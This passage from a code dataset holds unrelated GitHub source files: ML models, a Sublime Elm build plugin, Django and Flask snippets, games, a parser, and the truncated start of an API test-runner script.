migrations.AddField(\n model_name='bookversion',\n name='track_changes',\n field=models.BooleanField(default=False),\n preserve_default=True,\n ),\n ]\n","repo_name":"booktype/Booktype","sub_path":"lib/booki/editor/migrations/0005_bookversion_track_changes.py","file_name":"0005_bookversion_track_changes.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":894,"dataset":"github-code","pt":"53"} +{"seq_id":"8778211137","text":"import torch\nfrom torchvision import datasets as ds\nimport torch.nn as nn\nimport torch.nn.functional as fn\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nfrom Processing import *\n\nMNIST_ds = ds.MNIST(\"\", train=True, download=True)\n\ninputSize = 3 * 16\noutputSize = 10\n\nclass NumberDet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.input = nn.Linear(inputSize, 32)\n self.hidden = nn.Linear(32, 16)\n self.output = nn.Linear(16, outputSize)\n\n def forward(self, x):\n x = fn.relu(self.input(x))\n x = fn.relu(self.hidden(x))\n x = self.output(x)\n return x\n\nif __name__ == '__main__':\n splited_data = []\n for i in range(60000):\n splited_data.append(splitImage(MNIST_ds.data[i]))\n\n train_data = []\n for i 
in range(60000):\n features = []\n for item in splited_data[i]:\n features.append(processItem(item))\n train_data.append((torch.tensor(features), MNIST_ds[i][1]))\n print(\"Sample n°\", i, \" done!\")\n\n myNN = NumberDet()\n loss = nn.CrossEntropyLoss()\n optimizer = optim.Adam(myNN.parameters(), lr=0.002)\n epochs = 20\n\n train_ds, validation_ds = torch.utils.data.random_split(train_data, [50000, 10000])\n loaderTrain, loaderValidation = DataLoader(train_ds, batch_size=24), DataLoader(validation_ds, batch_size=24)\n # Boucle d'apprentissage\n for epoch in range(epochs):\n myNN.train()\n for features in loaderTrain:\n data, label = features\n output = myNN(data.float().view(-1, 48))\n cost = loss(output, label)\n myNN.zero_grad()\n cost.backward()\n optimizer.step()\n\n # Validation\n valid_loss, correct = 0, 0\n myNN.eval()\n for features in loaderValidation:\n data, label = features\n output = myNN(data.float().view(-1, 48))\n cost = loss(output, label)\n valid_loss += cost.item()\n correct += torch.sum(torch.argmax(output, dim=1) == label).item()\n valid_loss /= len(loaderValidation)\n correct /= len(loaderValidation.dataset)\n\n print(f\"epoch: {epoch + 1}, validation loss: {valid_loss:.4f}, correct predictions: {correct * 100:.2f}%\")\n\n torch.save(myNN.state_dict(), \"Prediction_Model.pth\")","repo_name":"Rd-Massou/Projet_IA","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72957369449","text":"from typing import TYPE_CHECKING, Optional\n\nfrom comitup import config, nm\n\nif TYPE_CHECKING:\n import NetworkManager\n\nSINGLE_MODE: str = \"single\"\nMULTI_MODE: str = \"router\"\n\nCONF_PATH: str = \"/etc/comitup.conf\"\n\nap_device: Optional[\"NetworkManager.Device\"] = None\nlink_device: Optional[\"NetworkManager.Device\"] = None\n\n\ndef get_conf() -> config.Config:\n (conf, _) = config.load_data()\n return conf\n\n\ndef dual_enabled() -> bool:\n return get_conf().getboolean(\"enable_appliance_mode\")\n\n\ndef get_mode() -> str:\n if len(nm.get_wifi_devices()) > 1 and dual_enabled():\n return MULTI_MODE\n else:\n return SINGLE_MODE\n\n\ndef get_ap_device() -> \"NetworkManager.Device\":\n global ap_device\n\n if not ap_device:\n devs = nm.get_wifi_devices()\n spec = get_conf().primary_wifi_device\n\n if spec:\n for dev in devs:\n if dev.Interface == spec:\n ap_device = dev\n\n if not ap_device:\n ap_device = devs[0]\n\n if ap_device:\n return ap_device\n else:\n raise\n\n\ndef get_link_device() -> \"NetworkManager.Device\":\n global link_device\n\n if not link_device:\n devs = nm.get_wifi_devices()\n link_device = get_ap_device()\n\n if dual_enabled():\n for dev in devs:\n if dev.Interface != link_device.Interface:\n link_device = dev\n return link_device\n\n return link_device\n\n\ndef get_state_device(state: str) -> \"NetworkManager.Device\":\n if state == \"HOTSPOT\":\n return get_ap_device()\n else:\n return get_link_device()\n","repo_name":"davesteele/comitup","sub_path":"comitup/modemgr.py","file_name":"modemgr.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"53"} +{"seq_id":"22606863496","text":"import unittest\nfrom answers import get_correct_answer\n\ndef is_prime(x):\n i = 2\n while i * i <= x:\n if x % i == 0:\n return False\n i += 1\n\n return True\n\ndef f(start, end):\n if start > end:\n return 0\n if start == end:\n return 1\n if 
start == 33:\n return 0\n else:\n x = start\n while x == start or not is_prime(x):\n x += 1\n return f(start + 2, end) + f(x, end)\n\ndef solve():\n return f(2, 14) * f(14, 45)\n\nclass Problem125(unittest.TestCase):\n def test(self):\n assert solve() == get_correct_answer(23, 125)\n\nif __name__ == '__main__':\n print(solve())","repo_name":"DmitryKochetkov/polyakov_py","sub_path":"solutions23/problem125.py","file_name":"problem125.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3285300973","text":"import pygame, sys, random\npygame.init()\nsize = (800, 500)\n# Create the window\nscreen = pygame.display.set_mode(size)\n#Clock\nclock = pygame.time.Clock()\n#Colors\nBlack = ( 0, 0, 0 )\nWhite = ( 255, 255, 255 )\nRed = ( 255, 0, 0 )\nGreen = ( 0, 255, 0 )\nBlue = ( 0, 0, 255 )\nOrange = ( 250, 105, 5 )\ncor_list = []\nfor i in range(80):\n x = random.randint(0,800)\n y = random.randint(0,500)\n cor_list.append([x, y])\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n screen.fill(White)\n #Start of drawing zone\n for cord in cor_list:\n \n pygame.draw.circle(screen, Red, cord, 2)\n if cord[1]<=500:\n cord[1]+=1\n cord[0] += random.randint(-1,1)\n else:\n cord[0]=random.randint(0,800)\n cord[1]=0\n \n #End of drawing zone\n #Paint the screen\n pygame.display.flip()\n clock.tick(30)","repo_name":"JosuePoz/PyGamePrueba","sub_path":"prueba5.py","file_name":"prueba5.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30645656855","text":"\nimport json\nimport os\nimport sublime\nimport sublime_plugin\nimport subprocess\nimport string\nimport threading\n\nUSER_SETTING_PREFIX = 'elm_language_support_'\nELM_SETTINGS_FILE = 'Elm Make this File.sublime-settings' \n\ndef get_popen_startupinfo():\n if os.name == 'nt':\n startupinfo = subprocess.STARTUPINFO()\n startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n startupinfo.wShowWindow = subprocess.SW_HIDE\n return startupinfo\n else:\n return None\n \nclass ElmMakeCommand(sublime_plugin.WindowCommand):\n\n encoding = 'utf-8'\n panel_lock = threading.Lock()\n killed = False\n proc = None\n\n def run(self, cmd=[], kill=False):\n if kill:\n if self.proc:\n self.killed = True\n self.proc.terminate()\n return\n\n working_dir = self.window.extract_variables()['file_path']\n self.create_panel(working_dir)\n\n if self.proc is not None:\n self.proc.terminate()\n self.proc = None\n\n self.proc = subprocess.Popen(\n self.format_cmd(cmd),\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n cwd=working_dir,\n startupinfo=get_popen_startupinfo()\n )\n self.killed = False\n\n threading.Thread(\n target=self.read_handle,\n args=(self.proc.stdout,)\n ).start()\n\n def format_cmd(self, cmd):\n binary, command, file, output = cmd[0:4]\n\n binary = binary.format(elm_binary=self.get_setting('elm_binary'))\n\n return [binary, command, file, output] + cmd[4:]\n\n def create_panel(self, working_dir):\n # Only allow one thread to touch output panel at a time\n with self.panel_lock:\n # implicitly clears previous contents\n self.panel = self.window.create_output_panel('exec')\n\n settings = self.panel.settings()\n\n self.panel.assign_syntax('Packages/Elm Make this File/Elm Compile Messages.sublime-syntax')\n settings.set('gutter', False)\n settings.set('scroll_past_end', False)\n settings.set('word_wrap', False) \n\n # 
Enable result navigation\n settings.set(\n 'result_file_regex',\n r'^\\-\\- \\w+: (?=.+ \\- (.+?):(\\d+)(?=:(\\d+))?)(.+) \\- .*$'\n )\n settings.set('result_base_dir', working_dir)\n\n preferences = sublime.load_settings('Preferences.sublime-settings')\n \n show_panel_on_build = preferences.get('show_panel_on_build', True)\n if show_panel_on_build:\n self.window.run_command('show_panel', {'panel': 'output.exec'})\n\n def read_handle(self, handle):\n chunk_size = 2 ** 13\n output = b''\n while True:\n try:\n chunk = os.read(handle.fileno(), chunk_size)\n output += chunk\n\n if chunk == b'':\n if output != b'':\n self.queue_write(self.format_output(output.decode(self.encoding)))\n raise IOError('EOF')\n\n except UnicodeDecodeError as e:\n msg = 'Error decoding output using %s - %s'\n self.queue_write(msg % (self.encoding, str(e)))\n break\n\n except IOError:\n if self.killed:\n msg = 'Cancelled'\n else:\n msg = 'Finished'\n sublime.set_timeout(lambda: self.finish(), 0)\n self.queue_write('[%s]' % msg)\n break\n\n def queue_write(self, text):\n # Calling set_timeout inside this function rather than inline ensures\n # that the value of text is captured for the lambda to use, and not\n # mutated before it can run.\n sublime.set_timeout(lambda: self.do_write(text), 1)\n\n def do_write(self, text):\n with self.panel_lock:\n self.panel.set_read_only(False)\n self.panel.run_command('append', {'characters': text})\n self.panel.set_read_only(True)\n sublime.set_timeout(lambda: self.panel.run_command(\"move_to\", {\"to\": \"bof\"}), 1)\n\n\n def format_output(self, output):\n try:\n data = json.loads(output)\n if data['type'] == 'compile-errors':\n return self.format_errors(data['errors'])\n elif data['type'] == 'error':\n return self.format_compiler_error(data)\n else:\n return 'Unrecognized compiler output:\\n' + str(output) + '\\n\\nPlease report this bug in Elm Language Support.\\n\\n'\n except ValueError as e:\n return ''\n\n def format_errors(self, errors):\n return '\\n'.join(map(self.format_error, errors)) + '\\n'\n\n def format_error(self, error):\n file = error['path']\n return '\\n'.join(map(lambda problem: self.format_problem(file, problem), error['problems']))\n\n def format_problem(self, file, problem):\n error_format = string.Template('-- $type: $title - $file:$line:$column\\n\\n$message\\n')\n\n type = 'error'\n title = problem['title']\n line = problem['region']['start']['line']\n column = problem['region']['start']['column']\n message = self.format_message(problem['message'])\n\n vars = locals()\n vars.pop('self') # https://bugs.python.org/issue23671\n return error_format.substitute(**vars)\n\n def format_compiler_error(self, error):\n error_format = string.Template('-- $type: $title - $file:1\\n\\n$message\\n')\n\n type = 'error'\n title = error['title']\n file = error['path']\n message = self.format_message(error['message'])\n\n vars = locals()\n vars.pop('self') # https://bugs.python.org/issue23671\n return error_format.substitute(**vars)\n\n def format_message(self, message):\n format = lambda msg: msg if isinstance(msg, str) else msg['string']\n\n return ''.join(map(format, message))\n\n def finish(self):\n errs = self.panel.find_all_results()\n if len(errs) == 0:\n sublime.status_message('Build finished')\n else:\n sublime.status_message('Build finished with %d errors' % len(errs))\n\n\n def get_setting(self, key, user_key=None):\n package_settings = sublime.load_settings(ELM_SETTINGS_FILE)\n user_settings = self.window.active_view().settings()\n\n return 
user_settings.get(user_key or (USER_SETTING_PREFIX + key), package_settings.get(key))\n","repo_name":"pdamoc/elm-make-this-file","sub_path":"elm_make.py","file_name":"elm_make.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39813475440","text":"from django.test import TestCase\nfrom django.db.models import Q\n\nfrom story.cms_services import (\n get_stories_qs,\n get_story_search_filter,\n)\nfrom story.models import Story\n\n\nclass StoryFilterTestCase(TestCase):\n def test_get_stories_qs(self):\n # Given: No additional setup required for this test\n\n # When: Calling get_stories_qs function\n stories_qs = get_stories_qs()\n\n # Then: We should get a queryset of all stories\n self.assertEqual(stories_qs.count(), Story.objects.count())\n\n def test_get_story_search_filter(self):\n # Given: A search type and search value\n search_type = 'title'\n search_value = 'example'\n\n # When: Calling get_story_search_filter function\n search_filter = get_story_search_filter(search_type, search_value)\n\n # Then: We should get a valid Q object for title search\n self.assertIsInstance(search_filter, Q)\n self.assertEqual(search_filter, Q(title__icontains=search_value))\n\n # Given: A search type and search value for author\n search_type = 'author'\n search_value = 'admin'\n\n # When: Calling get_story_search_filter function\n search_filter = get_story_search_filter(search_type, search_value)\n\n # Then: We should get a valid Q object for author search\n self.assertIsInstance(search_filter, Q)\n self.assertEqual(search_filter, Q(author__nickname__icontains=search_value))\n\n # Given: An unsupported search type\n search_type = 'unsupported'\n search_value = 'example'\n\n # When: Calling get_story_search_filter function\n search_filter = get_story_search_filter(search_type, search_value)\n\n # Then: We should get an empty Q object\n self.assertIsInstance(search_filter, Q)\n self.assertEqual(search_filter, Q())\n","repo_name":"cwadven/StoryBuilder","sub_path":"story/test/test_cms_services.py","file_name":"test_cms_services.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23633359535","text":"def max_val(t): \n \"\"\" t, tuple or list\n Each element of t is either an int, a tuple, or a list\n No tuple or list is empty\n Returns the maximum int in t or (recursively) in an element of t \"\"\" \n flatten_list = []\n maximum = 0\n for item in t:\n if isinstance(item, list) or isinstance(item, tuple):\n inner_maximum = max_val(item)\n if inner_maximum > maximum:\n maximum = inner_maximum\n continue\n else:\n continue\n else:\n if item > maximum:\n maximum = item\n continue\n else:\n continue\n return maximum","repo_name":"IanMezza/edx-6.00.1x","sub_path":"finalExam/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13438461182","text":"from flask import Blueprint, render_template\n\n\nindex_page = Blueprint(\n 'index',\n __name__,\n static_folder='static',\n template_folder='templates'\n)\n\n\n@index_page.route('/')\ndef index(pageTitle=None):\n from fsdemo.pagedata.index import IndexPageData\n indexData = IndexPageData()\n return render_template('index.html', pageData=indexData)\n\n\n@index_page.route('/about')\ndef about(pageTitle=None):\n from fsdemo.pagedata.about import 
AboutPageData\n aboutData = AboutPageData()\n return render_template('about.html', pageData=aboutData)\n","repo_name":"dyslab/flask-site-demo","sub_path":"fsdemo/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2175078787","text":"# -*- coding: utf-8 -*-\nimport analiseLexica as lxc\nimport analiseEscopo as esc\nimport csv\nimport alfabeto\n\n#Estados\nP = 50\nLDE = 51\nDE = 52\nDF = 53\nDT = 54\nT = 55\nDC = 56\nLI = 57\nLP = 58\nB = 59\nLDV = 60\nLS = 61\nDV = 62\nS = 63\nE = 64\nLV = 65\nL = 66\nR = 67\nY = 68\nF = 69\nLE = 70\nID = 71\nTRUE = 72\nFALSE = 73\nCHR = 74\nSTR = 75\nNUM = 76\nPLINHA = 77\nM = 78\nU = 79\nIDD = 80\nIDU = 81\nNB = 82\nMF = 83\nMC = 84\nNF = 85\nMT = 86\nME = 87\nMW = 88\n\n#Regras armazenadas na forma Left -> Right\n# RIGHT = [1,2,1,1,1,1,1,1,1,1,9,7,4,5,3,8,5,3,4,2,1,2,1,5,3,1,1,1,5,7,7,5,7,1,4,2,2,3,3,1,3,3,3,3,3,3,1,3,3,1,3,3,1,1,2,2,2,2,3,4,2,2,1,1,1,1,1,3,1,3,4,1,1,1,1,1,1,1]\n# LEFT = [P,LDE,LDE,DE,DE,T,T,T,T,T,DT,DT,DT,DC,DC,DF,LP,LP,B,LDV,LDV,LS,LS,DV,LI,LI,S,S,U,U,M,M,M,M,M,M,M,E,E,E,L,L,L,L,L,L,L,R,R,R,Y,Y,Y,F,F,F,F,F,F,F,F,F,F,F,F,F,F,LE,LE,LV,LV,LV,ID,TRUE,FALSE,CHR,STR,NUM]\nRIGHT = [1,\t\t2,\t\t1,\t\t1,\t\t1,\t\t1,\t\t1,\t\t1,\t\t1,\t\t1,\t\t9,\t\t8,\t\t4,\t\t5,\t\t3,\t\t10,\t\t5,\t\t3,\t\t4,\t\t2,\t\t1,\t\t2,\t\t1,\t\t5,\t\t3,\t\t1,\t\t1,\t\t1,\t\t6,\t\t9,\t\t9,\t\t7,\t\t8,\t\t2,\t\t4,\t\t2,\t\t2,\t\t3,\t\t3,\t\t1,\t\t3,\t\t3,\t\t3,\t\t3,\t\t3,\t\t3,\t\t1,\t\t3,\t\t3,\t\t1,\t\t3,\t\t3,\t\t1,\t\t1,\t\t2,\t\t2,\t\t2,\t\t2,\t\t3,\t\t5,\t\t2,\t\t2,\t\t1,\t\t1,\t\t1,\t\t1,\t\t1,\t\t3,\t\t1,\t\t3,\t\t4,\t\t1,\t\t1,\t\t1,\t\t1,\t\t1,\t\t\t1,\t\t\t1,\t\t1,\t\t1,\t\t0,\t\t0,\t\t0,\t\t0,\t\t0,\t\t0,\t\t0]\nLEFT = [P, LDE,\tLDE,\tDE,\t DE,\t T,\t T,\t T, T, \tT, \tDT, \tDT, \tDT, \tDC, \tDC, \tDF, \tLP, \tLP, \tB, \tLDV,\tLDV,\tLS, \tLS, \tDV, \tLI, \tLI, \tS, \tS, \tU, \tU, \tM,\t M, \tM, \tM, \tM, \tM, \tM, \tE, \tE, \tE, \tL, \tL, \tL, \tL,\t L, \tL, \tL, \tR, \tR,\t R, \tY, \tY, \tY, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF,\t LE, \tLE, \tLV,\t LV, \tLV,\t IDD,\tIDU,\tID, \tTRUE, \tFALSE, \tCHR, STR,\tNUM, NB, \tMF,\t MC,\t NF,\t MT, \tME,\t MW]\n\nTAB_ACTION_GOTO = list(csv.reader(open(\"TabelaActionGoTo.csv\",\"r\"),delimiter=\"\\t\"))\n\n#ordem dos tokens na tabela\nTOKEN_TAB_ACTION=[alfabeto.INTEGER,alfabeto.CHAR,alfabeto.BOOLEAN,alfabeto.STRING,alfabeto.TYPE,alfabeto.EQUALS,alfabeto.ARRAY,alfabeto.LEFT_SQUARE,alfabeto.RIGHT_SQUARE,alfabeto.OF,alfabeto.STRUCT,alfabeto.LEFT_BRACES,alfabeto.RIGHT_BRACES,alfabeto.SEMI_COLON,alfabeto.COLON,alfabeto.FUNCTION,alfabeto.LEFT_PARENTHESIS,alfabeto.RIGHT_PARENTHESIS,alfabeto.COMMA,alfabeto.VAR,alfabeto.IF,alfabeto.ELSE,alfabeto.WHILE,alfabeto.DO,alfabeto.BREAK,alfabeto.CONTINUE,alfabeto.AND,alfabeto.OR,alfabeto.LESS_THAN,alfabeto.GREATER_THAN,alfabeto.LESS_OR_EQUAL,alfabeto.GREATER_OR_EQUAL,alfabeto.EQUAL_EQUAL,alfabeto.NOT_EQUAL,alfabeto.PLUS,alfabeto.MINUS,alfabeto.TIMES,alfabeto.DIVIDE,alfabeto.PLUS_PLUS,alfabeto.MINUS_MINUS,alfabeto.NOT,alfabeto.DOT,alfabeto.ID,alfabeto.TRUE,alfabeto.FALSE,alfabeto.CHARACTER,alfabeto.STRINGVAL,alfabeto.NUMERAL,alfabeto.EOF,PLINHA,P,LDE,DE,T,DT,DC,DF,LP,B,LDV,LS,DV,LI,S,U,M,E,L,R,Y,F,LE,LV,IDD,IDU,ID,TRUE,FALSE,CHR,STR,NUM,NB,MF,MC,NF,MT,ME,MW]\n\n#contador token do código\nproximo=-1\n\ndef tokenTAB(a):\n \"\"\"Retorna a coluna na tabela ACTION\"\"\"\n return TOKEN_TAB_ACTION.index(a)+1\n\ndef nextTokenOld():\n 
\"\"\"Retorna token da pilha TOKENS do analisador léxico\"\"\"\n global proximo\n proximo+=1\n try:\n return lxc.tokens_stack[proximo]\n except:\n return alfabeto.EOF\n\ndef nextToken():\n global proximo\n proximo+=1\n return lxc.nextToken()\n\nErro = False\n\ndef parse(arq):\n lxc.openArq(arq)\n \"\"\"Analisador Sintático\"\"\"\n global Erro\n PILHA = [] #armazena os estados\n state = 0 #linha da tabela ACTION\n PILHA.append(state)\n tokenLido = nextToken()\n action = TAB_ACTION_GOTO[state+1][tokenTAB(tokenLido)]\n \n cont=0\n while (action!=\"acc\"):\n # print(\"TESTE DO TOKENLIDO no passo \"+str(cont))\n # lxc.printSingleToken(tokenLido)\n # print('Token secundario: ', lxc.tokenSecundario)\n # print(tokenLido)\n # print(\"TESTE DA TABELA\")\n # print(action)\n # print(\"TESTE DA PILHA\")\n # print(PILHA)\n if (action[0]==\"s\"):\n \"\"\"shift to state\"\"\"\n state=int(action[1:])\n PILHA.append(state)\n tokenLido=nextToken()\n action = TAB_ACTION_GOTO[state+1][tokenTAB(tokenLido)]\n cont+=1\n elif (action[0]==\"r\"):\n \"\"\"reduce rule\"\"\"\n rule=int(action[1:])\n for x in range(RIGHT[rule-1]):\n PILHA.pop()\n try:\n state=int(TAB_ACTION_GOTO[PILHA[-1]+1][tokenTAB(LEFT[rule-1])])\n except:\n print(\"Erro de sintaxe na linha \"+str(lxc.LINHAS[proximo]))\n Erro = True\n break\n PILHA.append(state)\n action=TAB_ACTION_GOTO[state+1][tokenTAB(tokenLido)]\n cont+=1\n esc.Semantics(rule, tokenLido)\n else:\n \"\"\"erro de sintaxe\"\"\"\n Erro = True\n # print('proximo eh ', proximo)\n print(\"Erro de sintaxe na linha \"+str(lxc.LINHAS[proximo]))\n break\n if (not Erro):\n print(\"Sem erro de sintaxe.\")\n \n\n","repo_name":"lucasg1/SSLCompiler","sub_path":"analiseSintatica.py","file_name":"analiseSintatica.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19798315203","text":"# Time Complexity: O(n)\n# Memory Complexity: O(1)\n\nfrom typing import Optional\n\nfrom utilities.ListNode import ListNode\n\n\nclass Solution:\n def middleNode(self, head: Optional[ListNode]) -> Optional[ListNode]:\n def get_size(node):\n counter = 0\n while node:\n node = node.next\n counter += 1\n return counter\n\n def get_nth(node, n):\n counter = 1\n while counter < n:\n node = node.next\n counter += 1\n return node\n\n size = get_size(head)\n return get_nth(head, size // 2 + 1)\n\n\n# arr = [1, 2, 3, 4, 5, 6]\n# lst = ListNode().arr2list(arr)\n# print(lst)\n# print(Solution().middleNode(lst))\n","repo_name":"Jakub-Domogala/LeetCode","sub_path":"1.easy/0876. Middle of the Linked List.py","file_name":"0876. 
Middle of the Linked List.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30556448385","text":"import torch\nfrom torch.nn.parameter import Parameter\nimport torch.nn as nn\n\nclass SRMLayer(nn.Module):\n def __init__(self, channel):\n super(SRMLayer, self).__init__()\n self.bn = nn.BatchNorm2d(channel)\n self.activation = nn.Sigmoid()\n\n def _style_pooling(self, x, eps=1e-5):\n N, C, _, _ = x.size()\n\n channel_mean = x.view(N, C, -1).mean(dim=2, keepdim=True)\n channel_var = x.view(N, C, -1).var(dim=2, keepdim=True) + eps\n channel_std = channel_var.sqrt()\n t = torch.cat((channel_mean, channel_std), dim=2)\n return t\n \n def _style_integration(self, t):\n\n z = torch.sum(z, dim=2)[:, :, None, None] # B x C x 1 x 1\n z_hat = self.bn(z)\n g = self.activation(z_hat)\n return g\n\n def forward(self, x):\n t = self._style_pooling(x)\n g = self._style_integration(t)\n return x * g\n\nif __name__ == '__main__':\n import os\n import torch\n import argparse\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n ## 先把图片放到cuda上,再把模型放到cuda上\n parser = argparse.ArgumentParser()\n\n args = parser.parse_args()\n args.backbone = '50'\n args.lane_classes = 11\n args.road_classes = 3\n args.scenes_classes = 4\n args.use_psa = True\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n ## 先把图片放到cuda上,再把模型放到cuda上\n # b, c, h, w\n img = torch.rand(1, 128, 12, 20).cuda()\n output_scenes = SRMLayer(img)","repo_name":"033186ZSY/RLSNet-master","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37048109712","text":"import kivy\nfrom kivy.app import App\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.label import Label\nfrom random import randint\nfrom randomai import Ai\n# from rulebasedai import Ai\n# from minimaxai import Ai\n\nWINNING_LINES = (\n ((0,0),(0,1),(0,2)),((1,0),(1,1),(1,2)),((2,0),(2,1),(2,2)),\n ((0,0),(1,0),(2,0)),((0,1),(1,1),(2,1)),((0,2),(1,2),(2,2)),\n ((0,0),(1,1),(2,2)),((0,2),(1,1),(2,0))\n)\n\nSYMBOLS = ('X', 'O')\n\ndef symbol_generator():\n while True:\n for symbol in SYMBOLS:\n yield symbol\n\n\nclass Board(GridLayout):\n\n grid = None\n symbols = None\n\n def __init__(self, cols=3, **kwargs):\n super(Board, self).__init__(**kwargs)\n\n self.cols = cols\n self.rows = cols\n self.symbols = symbol_generator()\n\n self.grid = [[None for col in range(self.cols)] for row in range(self.rows)]\n\n self.draw_tiles()\n self.init_players()\n\n def init_players(self):\n # Who is the first?\n self.bot = Ai(SYMBOLS[randint(0,1)], self.grid)\n\n if self.bot.symbol == 'X':\n (r,c) = self.bot.play_move(self.grid)\n self.grid[r][c].text = next(self.symbols)\n self.grid[r][c].font_size = 100\n\n def draw_tiles(self):\n for row in range(self.rows):\n for col in range(self.cols):\n tile = Button()\n tile.bind(on_release=self.on_click)\n self.grid[row][col] = tile\n self.add_widget(tile)\n\n def on_click(self, instance):\n # if it is already taken\n if instance.text:\n return None\n\n #if it is an empty(available) cell\n instance.text = next(self.symbols)\n #instance.text = self.symbols.next()\n instance.font_size = 100\n if not self.is_finished():\n # HUMAN이 둔 후, 게임이 끝나지 않았으면 AI가 수를 둔다\n (r, c) = self.bot.play_move(self.grid)\n self.grid[r][c].text = 
next(self.symbols)\n            self.grid[r][c].font_size = 100\n            self.is_finished()\n\n    def is_finished(self):\n        winner = self.check_winner()\n\n        if winner:\n            content = BoxLayout(orientation='vertical')\n            if winner == 'D':\n                content.add_widget(Label(text='Draw'))\n            else:\n                content.add_widget(Label(text='%s won the game!' % winner))\n            restart_button = Button(text='Game restart!!')\n            content.add_widget(restart_button)\n\n            popup = Popup(title='Game Ends', content=content, auto_dismiss=False, size_hint=(.5,.5))\n            popup.open()\n\n            restart_button.bind(on_press=lambda *args: self.restart_board(popup, *args))\n            return True\n        else:\n            return False\n\n    def check_winner(self):\n        for line in WINNING_LINES:\n            row = []\n            for cell in line:\n                row.append(self.grid[cell[0]][cell[1]].text)\n\n            for symbol in SYMBOLS:\n                if all([s==symbol for s in row]):\n                    return symbol\n        # game is still ongoing\n        for row in self.grid:\n            for col in row:\n                if col.text == '':\n                    return None\n        # Draw\n        return 'D'\n\n    def restart_board(self, *args):\n        # print(\"args\", args)\n        args[0].dismiss()\n\n        # clear board\n        for row in self.grid:\n            for col in row:\n                col.text = ''\n\n        # realign the symbol generator so that 'X' goes first again\n        if next(self.symbols) == 'X':\n            next(self.symbols)\n\n        # re-pick the bot's symbol and let it open if it drew 'X' (was unreachable dead code after early returns)\n        self.init_players()\n\nclass TicTacToe(App):\n    def build(self):\n        self.board = Board()\n        return self.board\n\nif __name__ == '__main__':\n    TicTacToe().run()\n","repo_name":"goodlucky-Joy/Python_TicTacToe","sub_path":"03_TicTacToe/03_TicTacToe_1player_Ai.py","file_name":"03_TicTacToe_1player_Ai.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25323405835","text":"def season(month):\n    if 3 <= month <= 5:\n        print(\"\\nSpring\")\n    elif 5 < month <= 8:\n        print(\"\\nSummer\")\n    elif 8 < month <= 11:\n        print(\"\\nAutumn\")\n    elif month == 12 or month == 1 or month == 2:\n        print(\"\\nWinter\")\n    else:\n        print(\"\\nError\")\n\n\nnum_of_month = int(input(\"Input number of month - \"))\nseason(num_of_month)\n","repo_name":"NarekManukyan/examples1","sub_path":"season.py","file_name":"season.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26975044212","text":"import shutil\nfrom threading import Thread\nfrom threading import Lock\nimport unittest\nfrom optparse import OptionParser\nimport ddt\nimport requests\nfrom requests.packages import urllib3\nimport json\nfrom json import JSONDecodeError\nimport apirun\n\nfrom .genReport import html_report\nfrom .getToken import get_token\nfrom .extractExcel import HandleExcel\nfrom .mail import *\nfrom .PressureTest import *\nfrom .PtSlave import ConnectSlave\n\n\nurllib3.disable_warnings()\nlogger = logging.getLogger(__name__)\nversion = apirun.__version__\nreport_dir = ''\nheaders = {\"Content-Type\": \"application/json\"}\n_success = 0\n_failure = 0\n_error = 0\n_count_lock = Lock()\n\n\ndef add_success(num_s):\n    global _success\n    _count_lock.acquire()\n    _success += num_s\n    _count_lock.release()\n\n\ndef add_failure(num_f):\n    global _failure\n    _count_lock.acquire()\n    _failure += num_f\n    _count_lock.release()\n\n\ndef add_error(num_e):\n    global _error\n    _count_lock.acquire()\n    _error += num_e\n    _count_lock.release()\n\n\ndef parse_options():\n    \"\"\"\n    Handle command-line options with optparse.OptionParser.\n\n    Return list of arguments, largely for use in `parse_arguments`.\n    \"\"\"\n\n    # Initialize\n    parser = OptionParser(usage=\"apirun 
